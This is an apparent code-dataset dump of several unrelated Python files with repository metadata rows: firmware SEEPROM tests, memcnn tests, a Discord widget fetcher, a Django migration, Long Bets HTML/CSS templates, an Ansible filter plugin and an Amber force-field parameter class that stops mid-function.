'''
Test Case 1
'''
readSeeprom(0, 128, 0x08000000, 0, 0)
print("SUCCESS: read seeprom valid")
# Read data from cache and verify its contents
# seeprom header
seepprmHdr = 'XIP SEPM'
#read from cache
readData = testMemUtil.getmem(0x08000000, 0x80, 0x02)
for byte in range(len(seepprmHdr)):
if( ord(seepprmHdr[byte]) != readData[byte ]):
print("Data mismtach at: ", byte)
print(" expected: ", ord(seepprmHdr[byte]))
print(" Actual: ", readData[byte])
            raise Exception('data mismatch');
'''
Test Case 2
'''
readSeeprom(0x38CA0, 0x180, 0x8973780, 0, 0)
print("SUCCESS: read seeprom HB testcase")
'''
Test Case 3
'''
readSeeprom(0x0, 0x40, 0x08000000, 0x03, 0x19)
print("SUCCESS: read seeprom size not aligned")
'''
Test Case 4
'''
readSeeprom(0x3fe80, 0x180, 0x08000000, 0x03, 0x19)
print("SUCCESS: read seeprom size exceeded")
'''
Test Case 5
'''
readSeeprom(0x7, 0x40, 0x08000000, 0x03, 0x19)
print("SUCCESS: read seeprom offset not aligned")
if __name__ == "__main__":
if testUtil.getMachineName() == "axone":
try:
main()
except:
print ( "\nTest Suite completed with error(s)" )
testUtil.collectFFDC()
            raise
print ( "\nTest Suite completed with no errors" )
else:
main()
if err:
print ( "\nTest Suite completed with error(s)" )
#sys.exit(1)
else:
print ( "\nTest Suite completed with no errors" )
#sys.exit(0);
| 38.123529 | 144 | 0.494214 | 606 | 6,481 | 5.20132 | 0.39769 | 0.019036 | 0.025381 | 0.036485 | 0.244607 | 0.219226 | 0.176079 | 0.096764 | 0.052665 | 0.034898 | 0 | 0.046821 | 0.235457 | 6,481 | 169 | 145 | 38.349112 | 0.589304 | 0.405339 | 0 | 0.151515 | 1 | 0 | 0.242948 | 0.014862 | 0 | 0 | 0.041553 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.090909 | 0 | 0.151515 | 0.227273 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20425193c1b51cfe42ea596643380c8747b1847 | 1,275 | py | Python | memcnn/experiment/tests/test_factory.py | classner/memcnn | 107ea40945b2b0d312d05cab5b78633e5f977a52 | [
"MIT"
] | 224 | 2018-03-03T02:46:54.000Z | 2022-02-12T14:33:56.000Z | memcnn/experiment/tests/test_factory.py | classner/memcnn | 107ea40945b2b0d312d05cab5b78633e5f977a52 | [
"MIT"
] | 62 | 2018-04-28T01:25:14.000Z | 2021-11-25T13:20:57.000Z | memcnn/experiment/tests/test_factory.py | classner/memcnn | 107ea40945b2b0d312d05cab5b78633e5f977a52 | [
"MIT"
] | 25 | 2018-04-20T18:08:12.000Z | 2022-02-03T22:13:44.000Z | import pytest
import os
import memcnn.experiment.factory
from memcnn.config import Config
def test_get_attr_from_module():
a = memcnn.experiment.factory.get_attr_from_module('memcnn.experiment.factory.get_attr_from_module')
assert a is memcnn.experiment.factory.get_attr_from_module
def test_load_experiment_config():
cfg_fname = os.path.join(Config.get_dir(), 'experiments.json')
memcnn.experiment.factory.load_experiment_config(cfg_fname, ['cifar10', 'resnet110'])
@pytest.mark.skip(reason="Covered more efficiently by test_train.test_run_experiment")
def test_experiment_config_parser(tmp_path):
tmp_data_dir = tmp_path / "tmpdata"
cfg_fname = os.path.join(Config.get_dir(), 'experiments.json')
cfg = memcnn.experiment.factory.load_experiment_config(cfg_fname, ['cifar10', 'resnet110'])
memcnn.experiment.factory.experiment_config_parser(cfg, str(tmp_data_dir), workers=None)
def test_circular_dependency(tmp_path):
p = str(tmp_path / "circular.json")
content = u'{ "circ": { "base": "circ" } }'
with open(p, 'w') as fh:
fh.write(content)
with open(p, 'r') as fh:
assert fh.read() == content
with pytest.raises(RuntimeError):
memcnn.experiment.factory.load_experiment_config(p, ['circ'])
| 37.5 | 104 | 0.741176 | 177 | 1,275 | 5.079096 | 0.333333 | 0.14238 | 0.204672 | 0.07564 | 0.452725 | 0.430478 | 0.382647 | 0.249166 | 0.249166 | 0.249166 | 0 | 0.009058 | 0.134118 | 1,275 | 33 | 105 | 38.636364 | 0.805254 | 0 | 0 | 0.08 | 0 | 0 | 0.175686 | 0.059608 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.16 | false | 0 | 0.16 | 0 | 0.32 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d205e00637b9718f14c4962c0430f40c178683e5 | 266 | py | Python | src/guildapi.py | nsde/discord-guildapi | b1303423e74c1370498e594429f3bf4aeae4ee95 | [
"MIT"
] | null | null | null | src/guildapi.py | nsde/discord-guildapi | b1303423e74c1370498e594429f3bf4aeae4ee95 | [
"MIT"
] | null | null | null | src/guildapi.py | nsde/discord-guildapi | b1303423e74c1370498e594429f3bf4aeae4ee95 | [
"MIT"
] | null | null | null | import requests
import json
def getguild(guild_id):
guild_id = str(guild_id)
http_response = requests.get(f'https://discord.com/api/guilds/{guild_id}/widget.json')
response_data = http_response.json()
data = json.dumps(response_data)
return data | 29.555556 | 90 | 0.733083 | 39 | 266 | 4.794872 | 0.538462 | 0.149733 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150376 | 266 | 9 | 91 | 29.555556 | 0.827434 | 0 | 0 | 0 | 0 | 0 | 0.198502 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d2066abfbaca62c1d5be55ef5d80f560df075d0a | 409 | py | Python | smarthome/smarthomeproj/server/migrations/0011_auto_20210122_0256.py | nunocaseiro/smarthome-server-django | 711db6ff360061d861d9985264f753e0f7846327 | [
"Apache-2.0"
] | null | null | null | smarthome/smarthomeproj/server/migrations/0011_auto_20210122_0256.py | nunocaseiro/smarthome-server-django | 711db6ff360061d861d9985264f753e0f7846327 | [
"Apache-2.0"
] | null | null | null | smarthome/smarthomeproj/server/migrations/0011_auto_20210122_0256.py | nunocaseiro/smarthome-server-django | 711db6ff360061d861d9985264f753e0f7846327 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.1.3 on 2021-01-22 02:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('server', '0010_auto_20210122_0054'),
]
operations = [
migrations.AlterField(
model_name='sensorvalue',
name='value',
field=models.DecimalField(decimal_places=2, max_digits=6),
),
]
| 21.526316 | 70 | 0.613692 | 45 | 409 | 5.444444 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.273839 | 409 | 18 | 71 | 22.722222 | 0.713805 | 0.110024 | 0 | 0 | 1 | 0 | 0.124309 | 0.063536 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20acbdc55dd2187f4e70d6f0f36211cc6ddf2d9 | 9,347 | py | Python | bets-templates.py | longnow/longview | 9345faacec64f427eab43790abc165af6a572e3d | [
"BSD-2-Clause"
] | 82 | 2015-01-23T04:20:31.000Z | 2022-02-18T22:33:53.000Z | bets-templates.py | longnow/longview | 9345faacec64f427eab43790abc165af6a572e3d | [
"BSD-2-Clause"
] | 2 | 2015-03-27T22:24:46.000Z | 2017-02-20T08:19:12.000Z | bets-templates.py | longnow/longview | 9345faacec64f427eab43790abc165af6a572e3d | [
"BSD-2-Clause"
] | 7 | 2015-06-04T20:37:02.000Z | 2021-03-10T02:41:08.000Z | # Copyright (c) 2004, The Long Now Foundation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# HTML template substitutions
#
# %n - nodeId (aka item number)
# %t - title
# %d - date string
# %1 [...] - positional arguments
# The HTML template used for a popup.
popupTemplate = """
<div class="node" id="node%n" onmouseout="javascript:hideNode('%n')">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp">
BET<br><span class="txt">%n</span></td>
<td class="exp" align="right">
%d
</td>
</tr>
</table>
<div class="txt-sm">
%1</div>
<table cellpadding="3" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp" align="right">
AGREE
</td>
<td class="txt" align="left">
%2
</td>
</tr>
<tr>
<td class="exp" align="right">
DISAGREE
</td>
<td class="txt" align="left">
%3
</td>
</tr>
<tr>
<td class="exp" align="right">
STAKES
</td>
<td class="txt" align="left">
%4
</td>
</tr>
</table>
</div>
"""
notifyTemplate = """
<div class="node" id="node%n" onmouseout="javascript:hideNode('%n')">
<table cellpadding="0" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp">
BET<br><span class="txt">%1</span></td>
<td class="exp" align="right">
REMEMBER AND REMIND
</td>
</tr>
</table>
<div class="txt-sm">
%2</div>
<table cellpadding="3" cellspacing="0" border="0" width="100%">
<tr>
<td class="exp" align="center">
%3
</td>
</tr>
</table>
</div>
"""
# this string gets written out in its entirety to styles.css
stylesheets = """
/* for the whole page, unless overridden */
body {
padding: 0;
margin: 0;
background-image: url("./img-static/bg.jpg");
}
/* Long Bets specific styles */
.exp {
font-size: 11px;
font-family: Verdana, Helvetica, sans-serif;
}
.txt-lg {
font-size: 16px;
font-family: Georgia, Times, serif;
}
.txt {
font-size: 14px;
font-family: Georgia, Times, serif;
}
.txt-sm {
font-size: 11px;
font-family: Georgia, Times, serif;
}
.txt-lt {
font-size: 14px;
font-family: Georgia, Times, serif;
color: #666666;
}
.node .txt-sm {
padding: 5px 0;
font-size: 12px;
}
.key {
width: 664px;
margin: 10px 0;
border: #ccc 1px solid;
}
.key td {
padding: 1px;
font-size: 11px;
width: 50%;
font-family: Verdana, Helvetica, sans-serif;
text-align: center;
}
/* links that have not been visited */
a:link {
color: #930;
text-decoration: none;
}
/* links that have already been visited */
a:visited {
color: #930;
text-decoration: none;
}
/* applied to a link when the cursor is hovering over it */
a:hover {
color: #c63;
text-decoration: underline;
}
/* the table at the very top of the page containing the logo image */
.logotable {
width: 100%; /* percent of the browser window occupied by the table */
margin: 0px;
padding: 0px;
}
/* the table data cell which contains the logo image */
.logo {
text-align: right;
background-color: #000;
border-bottom: 1px solid #996;
}
/* the table containing the title and navbar */
.titleandnav {
width: 100%; /* percent of the browser window occupied by the table */
}
/* the title cell itself */
.titlecell {
padding: 6px 10px; /* first value: top & bottom; second: left & right */
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 16px;
border-top: 1px solid #996;
border-bottom: 1px solid #996;
color: #666;
}
/* the table cell which holds the navigation bar & surrounding whitespace */
.navcell {
text-align: center;
vertical-align: middle;
padding-left: 15px;
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 10px;
color: #666;
}
/* table which holds the navigation bar & horizontal whitespace, but no
* vertical whitespace */
.navtable {
margin-left: auto;
margin-right: auto;
}
/* the dates on both ends of the navigation bar */
.navlabel {
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 10px;
padding: 4px;
}
/* table cell that holds the "Long View Powered" image */
.power {
padding-left: 15px;
padding-right: 5px;
text-align: right;
}
/* row of dates labeling the X-axis of the timeline, at the top */
.ytabletop {
border-bottom: 1px dotted #996;
}
/* cell containing an individual date label on the X-axis of the timeline */
.ycell {
text-align: center;
vertical-align: top;
padding: 0;
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
font-size: 10px;
}
/* row of dates labeling the X-axis of the timeline, at the bottom */
.ytablebottom {
border-top: 1px dotted #996;
border-bottom: 1px solid #996;
}
/* table cell containing "Past", "Now", and "Future" at the top of the */
/* timeline*/
.pastnowcell {
text-align: right;
padding: 0;
}
/* the table containing the body of the timeline */
#datatable {
border-top: 1px #ddd solid;
border-right: 1px #ddd solid;
background-image: url('./img-generated/timeline-bg.png');
}
/* the background of each timeline bar */
.data {
padding-top: 1px;
padding-bottom: 1px;
background-position: 200px;
background-repeat: repeat-x;
}
/* the block that contains all of the timeline labels on the left side of
* the screen. */
#labels {
position: absolute;
top: 26px;
z-index: 3;
}
/* cell containing a single label on the left side of the screen */
.labelscell {
font-size: 10px;
font-weight: normal;
font-family: verdana, helvetica, arial, sans-serif; /* in order of desirability */
color: #999;
padding-top: 3px;
border: 0;
}
/* the popups themselves */
.node {
position: absolute;
visibility: hidden;
color: #333;
width: 200px;
z-index: 5;
border: 1px solid #999;
background-image: url(./img-static/popup-bg.gif);
padding: 6px;
}
/* The body of the popups (eg the HTML inside the table) */
.popupcell {
font-size: 10px;
font-weight: normal;
font-family: verdana, helvetica, arial, sans-serif; /* in order of */
/* desirability */
}
/* Popup titles */
.popuptitle {
font-size: 12px;
}
"""
# override the default header top matter from the lvhtml module
headerTop = """<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%s</title>
<link rel="stylesheet" href="./styles.css" />
<script language="javascript" type="text/javascript" src="./rollover.js"></script>
</head>
<body onload="loadimgs();">
<img src="./img-static/no.gif" alt="" width="1" height="25" border="0"><br>
<div align="center">
<table cellpadding="0" cellspacing="0" border="0" width="664">
<tr>
<td colspan="3">
<img src="./img-static/timeline.gif" alt="Timeline" width="664" height="38" border="0"></td>
</tr>
<tr>
<td class="exp" nowrap>
<img src="./img-static/no.gif" alt="" width="5" height="1" border="0">
<span class="txt"><b>%s</b></span><br>
<!-- longview.py unused value hack: %s - %s -->
« On the Record: <a href="http://www.longbets.com/bets" target="_top">Bets</a> | <a href="http://www.longbets.com/predictions" target="_top">Predictions</a></td>
<td class="navcell" align="right" nowrap>
<table class="navtable" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="navlabel">
%s</td>
<td nowrap="nowrap">\n"""
# another override
headerBottom = """</td>
<td class="navlabel">%s</td>
</tr>
</table></td>
<td class="power"><img src="img-static/longview-power.gif" alt="Powered by Long View" width="89" height="22" border="0" /></td>
</td>
</tr>
</table>
<table class="key">
<tr>
<td>
Votes: YES <img src="img-generated/key1.png" alt="" width="65" height="12"> NO</td>
<td>
Discussion Intensity: LESS <img src="img-generated/key2.png" alt="" width="65" height="12"> MORE</td>
</tr>
</table>
</div>
</body>
</html>
"""
| 23.484925 | 167 | 0.642559 | 1,291 | 9,347 | 4.650658 | 0.299768 | 0.018654 | 0.01499 | 0.034644 | 0.380913 | 0.323451 | 0.25533 | 0.231346 | 0.193538 | 0.193538 | 0 | 0.028667 | 0.201348 | 9,347 | 397 | 168 | 23.544081 | 0.77562 | 0.172569 | 0 | 0.403333 | 0 | 0.023333 | 0.980387 | 0.078452 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20af14dd3e3f451b0c30965586bb3662c6ee4a4 | 768 | py | Python | ansible/roles/kraken.config/filter_plugins/expand_config.py | yenicapotediaz/k2 | 90aeb6efd77371c388b1429fc443aa30673c7787 | [
"Apache-2.0"
] | 85 | 2016-10-06T23:15:14.000Z | 2017-09-15T00:52:25.000Z | ansible/roles/kraken.config/filter_plugins/expand_config.py | yenicapotediaz/k2 | 90aeb6efd77371c388b1429fc443aa30673c7787 | [
"Apache-2.0"
] | 739 | 2016-09-19T21:48:58.000Z | 2017-09-15T17:46:52.000Z | ansible/roles/kraken.config/filter_plugins/expand_config.py | yenicapotediaz/k2 | 90aeb6efd77371c388b1429fc443aa30673c7787 | [
"Apache-2.0"
] | 47 | 2016-09-22T21:32:12.000Z | 2017-09-14T21:00:53.000Z | import copy, os
from ansible import errors


def expand_config(config_data):
    try:
        all_data = copy.deepcopy(expand_envs(config_data))
        return all_data
    except Exception, e:
        raise errors.AnsibleFilterError(
            'expand_config plugin error: {0}, config_data={1}'.format(
                str(e),
                str(config_data)))


def expand_envs(obj):
    if isinstance(obj, dict):
        return { key: expand_envs(val) for key, val in obj.items()}
    if isinstance(obj, list):
        return [ expand_envs(item) for item in obj ]
    if isinstance(obj, basestring):
        return os.path.expandvars(obj)
    return obj


class FilterModule(object):
    ''' Expand Kraken configuration file '''

    def filters(self):
        return {
            'expand_config': expand_config
        }
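# Example playbook usage (illustrative; assumes this file sits on the role's
# filter_plugins path and that `raw_config` is a previously loaded variable):
#
#   - set_fact:
#       expanded_config: "{{ raw_config | expand_config }}"
#
# expand_envs() walks nested dicts/lists/strings and expands $VAR / ${VAR}
# references via os.path.expandvars.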
| 26.482759 | 70 | 0.669271 | 101 | 768 | 4.950495 | 0.475248 | 0.096 | 0.09 | 0.072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003356 | 0.223958 | 768 | 28 | 71 | 27.428571 | 0.83557 | 0 | 0 | 0 | 0 | 0 | 0.083791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d20eb1e22a6672296afae7cc1ca61eef92581ba3 | 53,916 | py | Python | resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/MolKit/amberPrmTop.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | 8 | 2021-12-14T21:30:01.000Z | 2022-02-14T11:30:03.000Z | resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/MolKit/amberPrmTop.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/MolKit/amberPrmTop.py | J-E-J-S/aaRS-Pipeline | 43f59f28ab06e4b16328c3bc405cdddc6e69ac44 | [
"MIT"
] | null | null | null | ## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
############################################################################
#
# Author: Ruth HUEY, Michel F. SANNER
#
# Copyright: M. Sanner TSRI 2001
#
#############################################################################
# $Header: /opt/cvs/python/packages/share1.5/MolKit/amberPrmTop.py,v 1.32 2007/07/24 17:30:40 vareille Exp $
#
# $Id: amberPrmTop.py,v 1.32 2007/07/24 17:30:40 vareille Exp $
#
#from MolKit.molecule import Atom, AtomSet, Bond
from sff.amber import AmberParm
import numpy.oldnumeric as Numeric, types
from math import pi, sqrt, ceil, fabs
from string import split, strip, join
from os.path import basename
from MolKit.data.all_amino94_dat import all_amino94_dat
from MolKit.data.all_aminont94_dat import all_aminont94_dat
from MolKit.data.all_aminoct94_dat import all_aminoct94_dat
class Parm:
"""class to hold parameters for Amber Force Field calcuations
"""
def __init__(self, allDictList = [all_amino94_dat], ntDictList = [all_aminont94_dat],
ctDictList = [all_aminoct94_dat]):
#amber parameter reference dictionaries:
if len(allDictList)==0:
allDict = all_amino94_dat
else:
allDict = allDictList[0]
if type(allDict)==types.StringType:
allDict = self.getDictObj(allDict)
if len(allDictList)>1:
for d in allDictList:
if type(d)== types.StringType:
d = self.getDictObj(d)
allDict.update(d)
#allDict.extend(d)
self.allDict = allDict
if len(ntDictList)==0:
ntDict = all_aminont94_dat
else:
ntDict = ntDictList[0]
if type(ntDict)==types.StringType:
ntDict = self.getDictObj(ntDict)
if len(ntDictList)>1:
for d in ntDictList:
if type(d)== types.StringType:
d = self.getDictObj(d)
ntDict.update(d)
#ntDict.extend(d)
self.ntDict = ntDict
if len(ctDictList)==0:
ctDict = all_aminoct94_dat
else:
ctDict = ctDictList[0]
if type(ctDict)==types.StringType:
ctDict = self.getDictObj(ctDict)
if len(ctDictList)>1:
for d in ctDictList:
if type(d)== types.StringType:
d = self.getDictObj(d)
ctDict.update(d)
#ctDict.extend(d)
self.ctDict = ctDict
#formatD is used for write method
formatD = {}
for k in ['Iac', 'Iblo', 'Cno', 'Ipres', 'ExclAt']:
formatD[k] = ('%6d', 12, 0)
for k in ['Charges', 'Masses', 'Rk', 'Req', 'Tk', 'Teq',\
'Pk', 'Pn', 'Phase', 'Solty', 'Cn1', 'Cn2']:
formatD[k] = ('%16.8E', 5, 0)
for k in ['AtomNames', 'ResNames', 'AtomSym', 'AtomTree']:
formatD[k] = ('%-4.4s', 20, 0)
for k in ['allHBnds', 'allBnds']:
formatD[k] = ('%6d', 12, 3)
for k in ['allHAngs', 'allAngs']:
formatD[k] = ('%6d', 12, 4)
for k in ['allHDihe', 'allDihe']:
formatD[k] = ('%6d', 12, 5)
self.formatD = formatD
#processAtoms results are built in this dictionary
self.prmDict = {}
def getDictObj(self, nmstr):
#mod = __import__('MolKit/data/' + nmstr)
#dict = eval('mod.'+ nmstr)
mod = __import__('MolKit')
b = getattr(mod.data, nmstr)
dict = getattr(b, nmstr)
return dict
def loadFromFile(self, filename):
"""reads a parmtop file"""
self.prmDict = self.py_read(filename)
self.createSffCdataStruct(self.prmDict)
def processAtoms(self, atoms, parmDict=None, reorder=1):
"""finds all Amber parameters for the given set of atoms
parmDict is parm94_dat """
if atoms:
self.build(atoms, parmDict, reorder)
self.createSffCdataStruct(self.prmDict)
print 'after call to createSffCdataStruct'
def checkSanity(self):
d = self.prmDict
#length checks:
Natom = d['Natom']
assert len(d['Charges']) == Natom
assert len(d['Masses']) == Natom
assert len(d['Iac']) == Natom
assert len(d['Iblo']) == Natom
assert len(d['AtomRes']) == Natom
assert len(d['N14pairs']) == Natom
assert len(d['TreeJoin']) == Natom
Nres = d['Nres']
assert len(d['Ipres']) == Nres + 1
assert len(d['AtomNames']) == Natom * 4 + 81
assert len(d['AtomSym']) == Natom * 4 + 81
assert len(d['AtomTree']) == Natom * 4 + 81
assert len(d['ResNames']) == Nres * 4 + 81
#Ntypes is number of unique amber_types w/equiv replacement
Ntypes = d['Ntypes']
assert len(d['Cno']) == Ntypes**2
assert len(d['ExclAt']) == d['Nnb']
assert len(d['Cn1']) == Ntypes*(Ntypes+1)/2.
assert len(d['Cn2']) == Ntypes*(Ntypes+1)/2.
#Numbnd is number of bnd types
Numbnd = d['Numbnd']
assert len(d['Rk']) == Numbnd
assert len(d['Req']) == Numbnd
#Numang is number of angle types
Numang = d['Numang']
assert len(d['Tk']) == Numang
assert len(d['Teq']) == Numang
#Numptra is number of dihe types
Nptra = d['Nptra']
assert len(d['Pk']) == Nptra
assert len(d['Pn']) == Nptra
assert len(d['Phase']) == Nptra
assert len(d['Solty']) == d['Natyp']
#Nbona is number of bonds w/out H
Nbona = d['Nbona']
assert len(d['BondAt1']) == Nbona
assert len(d['BondAt2']) == Nbona
assert len(d['BondNum']) == Nbona
#Nbonh is number of bonds w/ H
Nbonh = d['Nbonh']
assert len(d['BondHAt1']) == Nbonh
assert len(d['BondHAt2']) == Nbonh
assert len(d['BondHNum']) == Nbonh
#Ntheta is number of angles w/out H
Ntheta = d['Ntheta']
assert len(d['AngleAt1']) == Ntheta
assert len(d['AngleAt2']) == Ntheta
assert len(d['AngleAt3']) == Ntheta
assert len(d['AngleNum']) == Ntheta
#Ntheth is number of angles w/ H
Ntheth = d['Ntheth']
assert len(d['AngleHAt1']) == Ntheth
assert len(d['AngleHAt2']) == Ntheth
assert len(d['AngleHAt3']) == Ntheth
assert len(d['AngleHNum']) == Ntheth
#Nphia is number of dihedrals w/out H
Nphia = d['Nphia']
assert len(d['DihAt1']) == Nphia
assert len(d['DihAt2']) == Nphia
assert len(d['DihAt3']) == Nphia
assert len(d['DihAt4']) == Nphia
assert len(d['DihNum']) == Nphia
#Nphih is number of dihedrals w/ H
Nphih = d['Nphih']
assert len(d['DihHAt1']) == Nphih
assert len(d['DihHAt2']) == Nphih
assert len(d['DihHAt3']) == Nphih
assert len(d['DihHAt4']) == Nphih
assert len(d['DihHNum']) == Nphih
##WHAT ABOUT HB10, HB12, N14pairs, N14pairlist
#value based on length checks:
#all values of BondNum and BondHNum in range (1, Numbnd)
for v in d['BondNum']:
assert v >0 and v < Numbnd + 1
for v in d['BondHNum']:
assert v >0 and v < Numbnd + 1
#all values of AngleNum and AngleHNum in range (1, Numang)
for v in d['AngleNum']:
assert v >0 and v < Numang + 1
for v in d['AngleHNum']:
assert v >0 and v < Numang + 1
#all values of DihNum and DihHNum in range (1, Nptra)
for v in d['DihNum']:
assert v >0 and v < Nptra + 1
for v in d['DihHNum']:
assert v >0 and v < Nptra + 1
def createSffCdataStruct(self, dict):
"""Create a C prm data structure"""
print 'in createSffCdataStruct'
self.ambPrm = AmberParm('test1', parmdict=dict)
print 'after call to init'
def build(self, allAtoms, parmDict, reorder):
# find out amber special residue name and
# order the atoms inside a residue to follow the Amber convention
self.residues = allAtoms.parent.uniq()
self.residues.sort()
self.fixResNamesAndOrderAtoms(reorder)
# save ordered chains
self.chains = self.residues.parent.uniq()
self.chains.sort()
# save ordered atoms
self.atoms = self.residues.atoms
# renumber them
self.atoms.number = range(1, len(allAtoms)+1)
print 'after call to checkRes'
self.getTopology(self.atoms, parmDict)
print 'after call to getTopology'
if reorder:
self.checkSanity()
print 'passed sanity check'
else:
print 'skipping sanity check'
return
def reorderAtoms(self, res, atList):
ats = []
rlen = len(res.atoms)
if rlen!=len(atList):
print "atoms missing in residue", res
print "expected:", atList
print "found :", res.atoms.name
for i in range(rlen):
a = atList[i]
for j in range(rlen):
b = res.atoms[j]
# DON'T rename HN atom H, HN1->H1, etc...
# use editCommands instead
#if b.name=='HN': b.name='H'
#elif len(b.name)==3 and b.name[:2]=='HN':
#b.name ='H'+b.name[2]
if b.name==a:
ats.append(b)
break
if len(ats)==len(res.atoms):
res.children.data = ats
res.atoms.data = ats
def fixResNamesAndOrderAtoms(self, reorder):
# level list of atom names used to rename residues
# check is HIS is HIS, HID, HIP, HIE, etc...
residues = self.residues
last = len(residues)-1
for i in range(len(residues)):
residue = residues[i]
chNames = residue.atoms.name
amberResType = residue.type
if amberResType=='CYS':
returnVal = 'CYS'
#3/21:
if 'HSG' in chNames or 'HG' in chNames:
amberResType ='CYS'
elif 'HN' in chNames:
amberResType = 'CYM'
else:
amberResType = 'CYX'
elif amberResType=='LYS':
# THIS DOESN'T SUPPORT LYH assigned in all.in
returnVal = 'LYS'
if 'HZ1' in chNames or 'HZN1' in chNames:
amberResType ='LYS'
else:
amberResType ='LYN'
elif amberResType=='ASP':
returnVal = 'ASP'
#3/21
if 'HD' in chNames or 'HD2' in chNames:
amberResType ='ASH'
else:
amberResType ='ASP'
elif amberResType=='GLU':
returnVal = 'GLU'
#3/21
if 'HE' in chNames or 'HE2' in chNames:
amberResType ='GLH'
else:
amberResType ='GLU'
elif amberResType=='HIS':
returnVal = 'HIS'
hasHD1 = 'HD1' in chNames
hasHD2 = 'HD2' in chNames
hasHE1 = 'HE1' in chNames
hasHE2 = 'HE2' in chNames
if hasHD1 and hasHE1:
if hasHD2 and not hasHE2:
amberResType = 'HID'
elif hasHD2 and hasHE2:
amberResType = 'HIP'
elif (not hasHD1) and (hasHE1 and hasHD2 and hasHE2):
amberResType = 'HIE'
else:
print 'unknown HISTIDINE config'
raise ValueError
residue.amber_type = amberResType
if residue == residue.parent.residues[0]:
residue.amber_dict = self.ntDict[amberResType]
